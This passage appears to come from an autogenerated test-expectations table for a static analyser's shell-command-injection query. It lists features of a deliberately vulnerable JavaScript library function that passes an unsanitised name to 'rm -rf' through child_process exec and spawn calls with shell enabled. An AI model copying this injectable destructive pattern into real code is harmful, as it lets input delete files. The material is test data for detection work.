unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | (err, out) => {} | contextSurroundingFunctionParameters | (name)\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | (err, out) => {} | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | (err, out) => {} | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | (err, out) => {} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | (err, out) => {} | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | exceptional return of anonymous function | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | return of anonymous function | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:51:417:53 | err | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:51:417:53 | err | contextSurroundingFunctionParameters | (name)\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:51:417:53 | err | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:51:417:53 | err | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:51:417:53 | err | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:56:417:58 | out | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:56:417:58 | out | contextSurroundingFunctionParameters | (name)\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:56:417:58 | out | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:56:417:58 | out | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:56:417:58 | out | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:3 | cp | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:9 | cp.spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:9 | cp.spawn | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:9 | cp.spawn | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:9 | cp.spawn | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:9 | cp.spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:45 | cp.spaw ... true}) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:45 | cp.spaw ... true}) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:45 | cp.spaw ... true}) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:45 | cp.spaw ... true}) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:45 | cp.spaw ... true}) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:45 | exceptional return of cp.spaw ... true}) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:45 | exceptional return of cp.spaw ... true}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:45 | exceptional return of cp.spaw ... true}) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:45 | exceptional return of cp.spaw ... true}) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:45 | exceptional return of cp.spaw ... true}) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:5:418:9 | spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:5:418:9 | spawn | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:5:418:9 | spawn | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:5:418:9 | spawn | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:5:418:9 | spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:11:418:14 | "rm" | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:11:418:14 | "rm" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:11:418:14 | "rm" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:11:418:14 | "rm" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:11:418:14 | "rm" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:11:418:14 | "rm" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:11:418:14 | "rm" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:11:418:14 | "rm" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:11:418:14 | "rm" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:17:418:29 | ["-rf", name] | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:17:418:29 | ["-rf", name] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:17:418:29 | ["-rf", name] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:17:418:29 | ["-rf", name] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:17:418:29 | ["-rf", name] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:17:418:29 | ["-rf", name] | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:17:418:29 | ["-rf", name] | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:17:418:29 | ["-rf", name] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:17:418:29 | ["-rf", name] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:18:418:22 | "-rf" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:18:418:22 | "-rf" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 